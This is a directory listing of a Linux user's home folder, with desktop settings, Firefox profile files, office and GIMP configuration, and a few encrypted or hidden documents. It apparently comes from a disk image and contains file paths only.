joe/.gconf/apps/nautilus/preferences/
joe/.gconf/apps/nautilus/preferences/%gconf.xml
joe/.gconf/apps/panel/
joe/.gconf/apps/panel/general/
joe/.gconf/apps/panel/general/%gconf.xml
joe/.gconf/apps/panel/objects/
joe/.gconf/apps/panel/objects/menu_bar_screen0/
joe/.gconf/apps/panel/objects/menu_bar_screen0/%gconf.xml
joe/.gconf/apps/panel/objects/browser_launcher_screen0/
joe/.gconf/apps/panel/objects/browser_launcher_screen0/%gconf.xml
joe/.gconf/apps/panel/objects/yelp_launcher_screen1/
joe/.gconf/apps/panel/objects/yelp_launcher_screen1/%gconf.xml
joe/.gconf/apps/panel/objects/%gconf.xml
joe/.gconf/apps/panel/objects/menu_bar_screen1/
joe/.gconf/apps/panel/objects/menu_bar_screen1/%gconf.xml
joe/.gconf/apps/panel/objects/yelp_launcher_screen0/
joe/.gconf/apps/panel/objects/yelp_launcher_screen0/%gconf.xml
joe/.gconf/apps/panel/objects/browser_launcher_screen1/
joe/.gconf/apps/panel/objects/browser_launcher_screen1/%gconf.xml
joe/.gconf/apps/panel/toplevels/
joe/.gconf/apps/panel/toplevels/bottom_panel_screen1/
joe/.gconf/apps/panel/toplevels/bottom_panel_screen1/background/
joe/.gconf/apps/panel/toplevels/bottom_panel_screen1/background/%gconf.xml
joe/.gconf/apps/panel/toplevels/bottom_panel_screen1/%gconf.xml
joe/.gconf/apps/panel/toplevels/bottom_panel_screen0/
joe/.gconf/apps/panel/toplevels/bottom_panel_screen0/background/
joe/.gconf/apps/panel/toplevels/bottom_panel_screen0/background/%gconf.xml
joe/.gconf/apps/panel/toplevels/bottom_panel_screen0/%gconf.xml
joe/.gconf/apps/panel/toplevels/top_panel_screen1/
joe/.gconf/apps/panel/toplevels/top_panel_screen1/background/
joe/.gconf/apps/panel/toplevels/top_panel_screen1/background/%gconf.xml
joe/.gconf/apps/panel/toplevels/top_panel_screen1/%gconf.xml
joe/.gconf/apps/panel/toplevels/%gconf.xml
joe/.gconf/apps/panel/toplevels/top_panel_screen0/
joe/.gconf/apps/panel/toplevels/top_panel_screen0/background/
joe/.gconf/apps/panel/toplevels/top_panel_screen0/background/%gconf.xml
joe/.gconf/apps/panel/toplevels/top_panel_screen0/%gconf.xml
joe/.gconf/apps/panel/%gconf.xml
joe/.gconf/apps/panel/applets/
joe/.gconf/apps/panel/applets/show_desktop_button_screen1/
joe/.gconf/apps/panel/applets/show_desktop_button_screen1/%gconf.xml
joe/.gconf/apps/panel/applets/notification_area_screen1/
joe/.gconf/apps/panel/applets/notification_area_screen1/%gconf.xml
joe/.gconf/apps/panel/applets/show_desktop_button_screen0/
joe/.gconf/apps/panel/applets/show_desktop_button_screen0/%gconf.xml
joe/.gconf/apps/panel/applets/notification_area_screen0/
joe/.gconf/apps/panel/applets/notification_area_screen0/%gconf.xml
joe/.gconf/apps/panel/applets/trashapplet_screen1/
joe/.gconf/apps/panel/applets/trashapplet_screen1/%gconf.xml
joe/.gconf/apps/panel/applets/%gconf.xml
joe/.gconf/apps/panel/applets/indicator_applet_screen1/
joe/.gconf/apps/panel/applets/indicator_applet_screen1/%gconf.xml
joe/.gconf/apps/panel/applets/window_list_screen1/
joe/.gconf/apps/panel/applets/window_list_screen1/%gconf.xml
joe/.gconf/apps/panel/applets/window_list_screen1/prefs/
joe/.gconf/apps/panel/applets/window_list_screen1/prefs/%gconf.xml
joe/.gconf/apps/panel/applets/clock_screen1/
joe/.gconf/apps/panel/applets/clock_screen1/%gconf.xml
joe/.gconf/apps/panel/applets/clock_screen1/prefs/
joe/.gconf/apps/panel/applets/clock_screen1/prefs/%gconf.xml
joe/.gconf/apps/panel/applets/workspace_switcher_screen1/
joe/.gconf/apps/panel/applets/workspace_switcher_screen1/%gconf.xml
joe/.gconf/apps/panel/applets/workspace_switcher_screen1/prefs/
joe/.gconf/apps/panel/applets/workspace_switcher_screen1/prefs/%gconf.xml
joe/.gconf/apps/panel/applets/indicator_applet_screen0/
joe/.gconf/apps/panel/applets/indicator_applet_screen0/%gconf.xml
joe/.gconf/apps/panel/applets/workspace_switcher_screen0/
joe/.gconf/apps/panel/applets/workspace_switcher_screen0/%gconf.xml
joe/.gconf/apps/panel/applets/workspace_switcher_screen0/prefs/
joe/.gconf/apps/panel/applets/workspace_switcher_screen0/prefs/%gconf.xml
joe/.gconf/apps/panel/applets/fast_user_switch_screen0/
joe/.gconf/apps/panel/applets/fast_user_switch_screen0/%gconf.xml
joe/.gconf/apps/panel/applets/fast_user_switch_screen1/
joe/.gconf/apps/panel/applets/fast_user_switch_screen1/%gconf.xml
joe/.gconf/apps/panel/applets/trashapplet_screen0/
joe/.gconf/apps/panel/applets/trashapplet_screen0/%gconf.xml
joe/.gconf/apps/panel/applets/window_list_screen0/
joe/.gconf/apps/panel/applets/window_list_screen0/%gconf.xml
joe/.gconf/apps/panel/applets/window_list_screen0/prefs/
joe/.gconf/apps/panel/applets/window_list_screen0/prefs/%gconf.xml
joe/.gconf/apps/panel/applets/clock_screen0/
joe/.gconf/apps/panel/applets/clock_screen0/%gconf.xml
joe/.gconf/apps/panel/applets/clock_screen0/prefs/
joe/.gconf/apps/panel/applets/clock_screen0/prefs/%gconf.xml
joe/.gconf/apps/%gconf.xml
joe/.gconf/apps/seahorse/
joe/.gconf/apps/seahorse/%gconf.xml
joe/.gconf/apps/seahorse/windows/
joe/.gconf/apps/seahorse/windows/%gconf.xml
joe/.gconf/apps/seahorse/listing/
joe/.gconf/apps/seahorse/listing/%gconf.xml
joe/.gconf/apps/evolution/
joe/.gconf/apps/evolution/%gconf.xml
joe/.gconf/apps/evolution/calendar/
joe/.gconf/apps/evolution/calendar/%gconf.xml
joe/.gconf/apps/evolution/calendar/notify/
joe/.gconf/apps/evolution/calendar/notify/%gconf.xml
joe/.gconf/apps/brasero/
joe/.gconf/apps/brasero/%gconf.xml
joe/.gconf/apps/brasero/config/
joe/.gconf/apps/brasero/config/priority/
joe/.gconf/apps/brasero/config/priority/%gconf.xml
joe/.gconf/apps/brasero/config/%gconf.xml
joe/Pictures/
joe/Pictures/logo.gif
joe/Pictures/chuck_norris_random_fact_generator_6_3957_2224_image_2561.jpg
joe/Pictures/chuck_norris_random_fact_generator_6_3957_2224_image_2578.jpg
joe/Pictures/funny_421.jpg
joe/.esd_auth
joe/.xsession-errors
joe/.gtk-bookmarks
joe/.mozilla/
joe/.mozilla/firefox/
joe/.mozilla/firefox/profiles.ini
joe/.mozilla/firefox/ji5h5a20.default/
joe/.mozilla/firefox/ji5h5a20.default/compreg.dat
joe/.mozilla/firefox/ji5h5a20.default/chrome/
joe/.mozilla/firefox/ji5h5a20.default/chrome/userContent-example.css
joe/.mozilla/firefox/ji5h5a20.default/chrome/userChrome-example.css
joe/.mozilla/firefox/ji5h5a20.default/mimeTypes.rdf
joe/.mozilla/firefox/ji5h5a20.default/key3.db
joe/.mozilla/firefox/ji5h5a20.default/compatibility.ini
joe/.mozilla/firefox/ji5h5a20.default/XPC.mfasl
joe/.mozilla/firefox/ji5h5a20.default/cert8.db
joe/.mozilla/firefox/ji5h5a20.default/pluginreg.dat
joe/.mozilla/firefox/ji5h5a20.default/extensions/
joe/.mozilla/firefox/ji5h5a20.default/formhistory.sqlite
joe/.mozilla/firefox/ji5h5a20.default/extensions.ini
joe/.mozilla/firefox/ji5h5a20.default/downloads.sqlite
joe/.mozilla/firefox/ji5h5a20.default/search.sqlite
joe/.mozilla/firefox/ji5h5a20.default/places.sqlite-journal
joe/.mozilla/firefox/ji5h5a20.default/urlclassifierkey3.txt
joe/.mozilla/firefox/ji5h5a20.default/signons.sqlite
joe/.mozilla/firefox/ji5h5a20.default/extensions.rdf
joe/.mozilla/firefox/ji5h5a20.default/prefs.js
joe/.mozilla/firefox/ji5h5a20.default/search.json
joe/.mozilla/firefox/ji5h5a20.default/secmod.db
joe/.mozilla/firefox/ji5h5a20.default/.parentlock
joe/.mozilla/firefox/ji5h5a20.default/cookies.sqlite
joe/.mozilla/firefox/ji5h5a20.default/bookmarks.html
joe/.mozilla/firefox/ji5h5a20.default/localstore.rdf
joe/.mozilla/firefox/ji5h5a20.default/Cache/
joe/.mozilla/firefox/ji5h5a20.default/Cache/_CACHE_003_
joe/.mozilla/firefox/ji5h5a20.default/Cache/2A32E8DAd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/BD3457DEd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/3954CE6Ed01
joe/.mozilla/firefox/ji5h5a20.default/Cache/2F85709Ad01
joe/.mozilla/firefox/ji5h5a20.default/Cache/47445552d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/E0A9A442d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/611C9EECd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/5634D1F9d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/5B0122ACd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/6B8C2D8Ed01
joe/.mozilla/firefox/ji5h5a20.default/Cache/A843C8B8d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/47C815E0d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/A8A78C65d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/0F03B2C5d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/D7DFB6FAd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/_CACHE_002_
joe/.mozilla/firefox/ji5h5a20.default/Cache/A718913Ad01
joe/.mozilla/firefox/ji5h5a20.default/Cache/60F3724Bd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/6D7313F3d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/EAE50599d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/1BB76077d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/FCC698B7d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/0B66D1E4d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/2B2A6EB8d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/8E40E94Fd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/A1FB26EBd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/F9D7526Fd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/1F9212B5d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/4E25B9B1d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/BC64C5CFd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/6A26639Ad01
joe/.mozilla/firefox/ji5h5a20.default/Cache/35B9FFA4d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/67C3D603d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/6FD58703d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/323F825Dd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/24ABAC5Ed01
joe/.mozilla/firefox/ji5h5a20.default/Cache/1AE4C69Dd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/_CACHE_001_
joe/.mozilla/firefox/ji5h5a20.default/Cache/ED38E2E7d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/A9D1B795d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/1F09BCFDd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/E7A5F3EFd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/F9D0526Fd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/1FF0F532d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/63B1734Bd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/36A05174d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/E461A381d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/444225A7d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/642BEFBCd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/0509B832d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/75687CC9d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/D96BCE28d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/BE437AE0d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/_CACHE_MAP_
joe/.mozilla/firefox/ji5h5a20.default/Cache/D97B28E1d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/4B46226Fd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/F5C1B0B4d01
joe/.mozilla/firefox/ji5h5a20.default/Cache/A4B02E4Bd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/F0FDAB5Ad01
joe/.mozilla/firefox/ji5h5a20.default/Cache/582030EBd01
joe/.mozilla/firefox/ji5h5a20.default/Cache/A842CB0Ed01
joe/.mozilla/firefox/ji5h5a20.default/Cache/DBA2D3E0d01
joe/.mozilla/firefox/ji5h5a20.default/xpti.dat
joe/.mozilla/firefox/ji5h5a20.default/XUL.mfasl
joe/.mozilla/firefox/ji5h5a20.default/permissions.sqlite
joe/.mozilla/firefox/ji5h5a20.default/bookmarkbackups/
joe/.mozilla/firefox/ji5h5a20.default/bookmarkbackups/bookmarks-2010-05-23.json
joe/.mozilla/firefox/ji5h5a20.default/urlclassifier3.sqlite
joe/.mozilla/firefox/ji5h5a20.default/places.sqlite
joe/.mozilla/firefox/ji5h5a20.default/extensions.cache
joe/.mozilla/firefox/ji5h5a20.default/content-prefs.sqlite
joe/.mozilla/extensions/
joe/.mozilla/extensions/{ec8030f7-c20a-464f-9b0e-13a3a9e97384}/
joe/Desktop/
joe/Joe Hacker.asc
joe/.macromedia/
joe/.macromedia/Flash_Player/
joe/.macromedia/Flash_Player/macromedia.com/
joe/.macromedia/Flash_Player/macromedia.com/support/
joe/.macromedia/Flash_Player/macromedia.com/support/flashplayer/
joe/.macromedia/Flash_Player/macromedia.com/support/flashplayer/sys/
joe/.macromedia/Flash_Player/macromedia.com/support/flashplayer/sys/#www.smilebox.com/
joe/.macromedia/Flash_Player/macromedia.com/support/flashplayer/sys/#www.smilebox.com/settings.sol
joe/.macromedia/Flash_Player/macromedia.com/support/flashplayer/sys/settings.sol
joe/.macromedia/Flash_Player/macromedia.com/support/flashplayer/sys/#smilebox.com/
joe/.macromedia/Flash_Player/macromedia.com/support/flashplayer/sys/#smilebox.com/settings.sol
joe/.macromedia/Flash_Player/#SharedObjects/
joe/.macromedia/Flash_Player/#SharedObjects/TLHF5ZK7/
joe/.macromedia/Flash_Player/#SharedObjects/TLHF5ZK7/www.smilebox.com/
joe/.macromedia/Flash_Player/#SharedObjects/TLHF5ZK7/www.smilebox.com/smilebox_webusage.sol
joe/.macromedia/Flash_Player/#SharedObjects/TLHF5ZK7/smilebox.com/
joe/.macromedia/Flash_Player/#SharedObjects/TLHF5ZK7/smilebox.com/smilebox_clientproperties.sol
joe/.cache/
joe/.cache/gedit/
joe/.cache/gedit/gedit-metadata.xml
joe/.cache/compizconfig/
joe/.cache/compizconfig/ezoom.pb
joe/.cache/compizconfig/loginout.pb
joe/.cache/compizconfig/titleinfo.pb
joe/.cache/compizconfig/commands.pb
joe/.cache/compizconfig/gears.pb
joe/.cache/compizconfig/switcher.pb
joe/.cache/compizconfig/obs.pb
joe/.cache/compizconfig/session.pb
joe/.cache/compizconfig/splash.pb
joe/.cache/compizconfig/shelf.pb
joe/.cache/compizconfig/reflex.pb
joe/.cache/compizconfig/wobbly.pb
joe/.cache/compizconfig/svg.pb
joe/.cache/compizconfig/core.pb
joe/.cache/compizconfig/wallpaper.pb
joe/.cache/compizconfig/inotify.pb
joe/.cache/compizconfig/mblur.pb
joe/.cache/compizconfig/bicubic.pb
joe/.cache/compizconfig/crashhandler.pb
joe/.cache/compizconfig/extrawm.pb
joe/.cache/compizconfig/scaleaddon.pb
joe/.cache/compizconfig/scale.pb
joe/.cache/compizconfig/snap.pb
joe/.cache/compizconfig/showdesktop.pb
joe/.cache/compizconfig/colorfilter.pb
joe/.cache/compizconfig/resize.pb
joe/.cache/compizconfig/blur.pb
joe/.cache/compizconfig/bench.pb
joe/.cache/compizconfig/firepaint.pb
joe/.cache/compizconfig/dbus.pb
joe/.cache/compizconfig/screenshot.pb
joe/.cache/compizconfig/cubeaddon.pb
joe/.cache/compizconfig/zoom.pb
joe/.cache/compizconfig/regex.pb
joe/.cache/compizconfig/rotate.pb
joe/.cache/compizconfig/put.pb
joe/.cache/compizconfig/text.pb
joe/.cache/compizconfig/workarounds.pb
joe/.cache/compizconfig/widget.pb
joe/.cache/compizconfig/fade.pb
joe/.cache/compizconfig/ring.pb
joe/.cache/compizconfig/water.pb
joe/.cache/compizconfig/mousepoll.pb
joe/.cache/compizconfig/mag.pb
joe/.cache/compizconfig/grid.pb
joe/.cache/compizconfig/staticswitcher.pb
joe/.cache/compizconfig/thumbnail.pb
joe/.cache/compizconfig/vpswitch.pb
joe/.cache/compizconfig/animationaddon.pb
joe/.cache/compizconfig/place.pb
joe/.cache/compizconfig/fs.pb
joe/.cache/compizconfig/winrules.pb
joe/.cache/compizconfig/maximumize.pb
joe/.cache/compizconfig/gnomecompat.pb
joe/.cache/compizconfig/annotate.pb
joe/.cache/compizconfig/opacify.pb
joe/.cache/compizconfig/fadedesktop.pb
joe/.cache/compizconfig/imgjpeg.pb
joe/.cache/compizconfig/scalefilter.pb
joe/.cache/compizconfig/kdecompat.pb
joe/.cache/compizconfig/shift.pb
joe/.cache/compizconfig/trailfocus.pb
joe/.cache/compizconfig/expo.pb
joe/.cache/compizconfig/3d.pb
joe/.cache/compizconfig/decoration.pb
joe/.cache/compizconfig/png.pb
joe/.cache/compizconfig/animation.pb
joe/.cache/compizconfig/neg.pb
joe/.cache/compizconfig/resizeinfo.pb
joe/.cache/compizconfig/group.pb
joe/.cache/compizconfig/cube.pb
joe/.cache/compizconfig/move.pb
joe/.cache/compizconfig/addhelper.pb
joe/.cache/compizconfig/showmouse.pb
joe/.cache/compizconfig/glib.pb
joe/.cache/compizconfig/minimize.pb
joe/.cache/compizconfig/video.pb
joe/.cache/compizconfig/wall.pb
joe/.cache/compizconfig/clone.pb
joe/.cache/notify-osd.log
joe/.cache/vlc/
joe/.cache/vlc/CACHEDIR.TAG
joe/.cache/vlc/plugins-04041e.dat
joe/.cache/event-sound-cache.tdb.9588dbce1fca58830d10168a4aba6077.i486-pc-linux-gnu
joe/.gnome2/
joe/.gnome2/accels/
joe/.gnome2/accels/gedit
joe/.gnome2/accels/nautilus
joe/.gnome2/gedit/
joe/.gnome2/gedit/gedit-2
joe/.gnome2/nautilus-scripts/
joe/.gnome2/keyrings/
joe/.gnome2/keyrings/login.keyring
joe/.gnome2/panel2.d/
joe/.gnome2/panel2.d/default/
joe/.gnome2/panel2.d/default/launchers/
joe/.openoffice.org/
joe/.openoffice.org/3/
joe/.openoffice.org/3/user/
joe/.openoffice.org/3/user/wordbook/
joe/.openoffice.org/3/user/temp/
joe/.openoffice.org/3/user/Scripts/
joe/.openoffice.org/3/user/uno_packages/
joe/.openoffice.org/3/user/uno_packages/cache/
joe/.openoffice.org/3/user/uno_packages/cache/uno_packages/
joe/.openoffice.org/3/user/uno_packages/cache/uno_packages.db
joe/.openoffice.org/3/user/uno_packages/cache/registry/
joe/.openoffice.org/3/user/uno_packages/cache/registry/com.sun.star.comp.deployment.executable.PackageRegistryBackend/
joe/.openoffice.org/3/user/uno_packages/cache/registry/com.sun.star.comp.deployment.help.PackageRegistryBackend/
joe/.openoffice.org/3/user/uno_packages/cache/registry/com.sun.star.comp.deployment.configuration.PackageRegistryBackend/
joe/.openoffice.org/3/user/uno_packages/cache/registry/com.sun.star.comp.deployment.configuration.PackageRegistryBackend/registry/
joe/.openoffice.org/3/user/uno_packages/cache/registry/com.sun.star.comp.deployment.configuration.PackageRegistryBackend/registered_packages.db
joe/.openoffice.org/3/user/uno_packages/cache/registry/com.sun.star.comp.deployment.sfwk.PackageRegistryBackend/
joe/.openoffice.org/3/user/uno_packages/cache/registry/com.sun.star.comp.deployment.script.PackageRegistryBackend/
joe/.openoffice.org/3/user/uno_packages/cache/registry/com.sun.star.comp.deployment.component.PackageRegistryBackend/
joe/.openoffice.org/3/user/uno_packages/cache/stamp.sys
joe/.openoffice.org/3/user/uno_packages/cache/log.txt
joe/.openoffice.org/3/user/basic/
joe/.openoffice.org/3/user/basic/dialog.xlc
joe/.openoffice.org/3/user/basic/Standard/
joe/.openoffice.org/3/user/basic/Standard/dialog.xlb
joe/.openoffice.org/3/user/basic/Standard/script.xlb
joe/.openoffice.org/3/user/basic/Standard/Module1.xba
joe/.openoffice.org/3/user/basic/script.xlc
joe/.openoffice.org/3/user/autotext/
joe/.openoffice.org/3/user/autotext/mytexts.bau
joe/.openoffice.org/3/user/registry/
joe/.openoffice.org/3/user/registry/cache/
joe/.openoffice.org/3/user/registry/cache/org.openoffice.TypeDetection.Types.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.UI.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Paths.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Commands.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Recovery.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Common.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Jobs.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.TypeDetection.GraphicFilter.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Linguistic.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Substitution.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.ucb.Configuration.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Writer.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.UI.WriterWindowState.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.TypeDetection.UISort.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.TabBrowse.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.LDAP.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.UI.WriterCommands.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.WriterWeb.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.System.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Views.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.TypeDetection.Filter.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.ucb.Store.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.UI.GenericCommands.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Addons.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.TypeDetection.Misc.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.VCL.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.DataAccess.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.SFX.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.TypeDetection.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.UserProfile.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.UI.Factories.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Accelerators.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Logging.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.UI.Controller.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.ProtocolHandler.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Events.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Setup.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Compatibility.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.UI.GlobalSettings.dat
joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Histories.dat
joe/.openoffice.org/3/user/registry/data/
joe/.openoffice.org/3/user/registry/data/org/
joe/.openoffice.org/3/user/registry/data/org/openoffice/
joe/.openoffice.org/3/user/registry/data/org/openoffice/Office/
joe/.openoffice.org/3/user/registry/data/org/openoffice/Office/Histories.xcu
joe/.openoffice.org/3/user/registry/data/org/openoffice/Office/Recovery.xcu
joe/.openoffice.org/3/user/registry/data/org/openoffice/Office/Common.xcu
joe/.openoffice.org/3/user/registry/data/org/openoffice/Office/Views.xcu
joe/.openoffice.org/3/user/registry/data/org/openoffice/Office/Writer.xcu
joe/.openoffice.org/3/user/registry/data/org/openoffice/Office/UI/
joe/.openoffice.org/3/user/registry/data/org/openoffice/Office/UI/WriterWindowState.xcu
joe/.openoffice.org/3/user/registry/data/org/openoffice/Office/Linguistic.xcu
joe/.openoffice.org/3/user/registry/data/org/openoffice/Setup.xcu
joe/.openoffice.org/3/user/config/
joe/.openoffice.org/3/user/config/javasettings_Linux_x86.xml
joe/.openoffice.org/3/user/config/modern_en-GB.sog
joe/.openoffice.org/3/user/config/autotbl.fmt
joe/.openoffice.org/3/user/config/cmyk.soc
joe/.openoffice.org/3/user/config/palette_en-GB.soc
joe/.openoffice.org/3/user/config/standard.soc
joe/.openoffice.org/3/user/config/soffice.cfg/
joe/.openoffice.org/3/user/config/soffice.cfg/modules/
joe/.openoffice.org/3/user/config/soffice.cfg/modules/swriter/
joe/.openoffice.org/3/user/config/soffice.cfg/modules/swriter/toolbar/
joe/.openoffice.org/3/user/config/soffice.cfg/modules/swriter/images/
joe/.openoffice.org/3/user/config/soffice.cfg/modules/swriter/images/Bitmaps/
joe/.openoffice.org/3/user/config/soffice.cfg/modules/swriter/menubar/
joe/.openoffice.org/3/user/config/soffice.cfg/modules/swriter/statusbar/
joe/.openoffice.org/3/user/config/hatching_en-US_en-ZA.soh
joe/.openoffice.org/3/user/config/standard.sod
joe/.openoffice.org/3/user/config/palette_en-US_en-ZA.soc
joe/.openoffice.org/3/user/config/html.soc
joe/.openoffice.org/3/user/config/arrowhd_en-GB.soe
joe/.openoffice.org/3/user/config/web.soc
joe/.openoffice.org/3/user/config/hatching_en-GB.soh
joe/.openoffice.org/3/user/config/standard.sob
joe/.openoffice.org/3/user/config/modern_en-US_en-ZA.sog
joe/.openoffice.org/3/user/config/standard.soh
joe/.openoffice.org/3/user/config/palette_en-US.soc
joe/.openoffice.org/3/user/config/modern_en-US.sog
joe/.openoffice.org/3/user/config/hatching_en-US.soh
joe/.openoffice.org/3/user/config/standard.sog
joe/.openoffice.org/3/user/config/classic_en-GB.sog
joe/.openoffice.org/3/user/config/styles_en-US.sod
joe/.openoffice.org/3/user/config/arrowhd_en-US_en-ZA.soe
joe/.openoffice.org/3/user/config/classic_en-US.sog
joe/.openoffice.org/3/user/config/classic_en-US_en-ZA.sog
joe/.openoffice.org/3/user/config/gallery.soc
joe/.openoffice.org/3/user/config/standard.soe
joe/.openoffice.org/3/user/config/arrowhd_en-US.soe
joe/.openoffice.org/3/user/config/sun-color.soc
joe/.openoffice.org/3/user/config/styles_en-US_en-ZA.sod
joe/.openoffice.org/3/user/config/styles_en-GB.sod
joe/.openoffice.org/3/user/backup/
joe/.openoffice.org/3/user/template/
joe/.openoffice.org/3/user/psprint/
joe/.openoffice.org/3/user/psprint/driver/
joe/.openoffice.org/3/user/psprint/fontmetric/
joe/.openoffice.org/3/user/psprint/pspfontcache
joe/.openoffice.org/3/user/autocorr/
joe/.openoffice.org/3/user/gallery/
joe/.openoffice.org/3/user/gallery/sg30.thm
joe/.openoffice.org/3/user/gallery/sg30.sdv
joe/.openoffice.org/3/user/gallery/sg100.sdv
joe/.openoffice.org/3/user/gallery/sg100.thm
joe/.openoffice.org/3/user/database/
joe/.openoffice.org/3/user/database/evolocal.odb
joe/.openoffice.org/3/user/database/biblio.odb
joe/.openoffice.org/3/user/database/biblio/
joe/.openoffice.org/3/user/database/biblio/biblio.dbf
joe/.openoffice.org/3/user/database/biblio/biblio.dbt
joe/.openoffice.org/3/user/store/
joe/Documents/
joe/Documents/cryptoD.gpg
joe/Documents/.hiddenDocuments/
joe/Documents/.hiddenDocuments/SuperSecret.odt
joe/gppg-stuff.txt
joe/.thumbnails/
joe/.thumbnails/normal/
joe/.thumbnails/normal/95e207e441e8b3e27f8e31ad31500fee.png
joe/.viminfo
joe/.gnome2_private/
joe/.gimp-2.6/
joe/.gimp-2.6/scripts/
joe/.gimp-2.6/themes/
joe/.gimp-2.6/sessionrc
joe/.gimp-2.6/levels/
joe/.gimp-2.6/brushes/
joe/.gimp-2.6/patterns/
joe/.gimp-2.6/curves/
joe/.gimp-2.6/gfig/
joe/.gimp-2.6/colorrc
joe/.gimp-2.6/controllerrc
joe/.gimp-2.6/templaterc
joe/.gimp-2.6/fractalexplorer/
joe/.gimp-2.6/tmp/
joe/.gimp-2.6/pluginrc
joe/.gimp-2.6/fonts/
joe/.gimp-2.6/parasiterc
joe/.gimp-2.6/modules/
joe/.gimp-2.6/plug-ins/
joe/.gimp-2.6/tool-options/
joe/.gimp-2.6/themerc
joe/.gimp-2.6/menurc
joe/.gimp-2.6/interpreters/
joe/.gimp-2.6/toolrc
joe/.gimp-2.6/gtkrc
joe/.gimp-2.6/environ/
joe/.gimp-2.6/gradients/
joe/.gimp-2.6/gimpressionist/
joe/.gimp-2.6/palettes/
joe/.gimp-2.6/dockrc
joe/.gimp-2.6/unitrc
joe/.gimp-2.6/gflare/
joe/.gimp-2.6/templates/
joe/.update-notifier/
joe/scans/
joe/scans/localhost.scan
joe/Videos/
joe/.gconfd/
joe/.gconfd/saved_state
joe/.recently-used.xbel
joe/.adobe/
joe/.adobe/Flash_Player/
joe/.adobe/Flash_Player/AssetCache/
joe/.adobe/Flash_Player/AssetCache/SZK5XWWC/
joe/.secrets
joe/Templates/
joe/.bash_logout
joe/.local/
joe/.local/share/
joe/.local/share/gvfs-metadata/
joe/.local/share/gvfs-metadata/home-dbd603fd.log
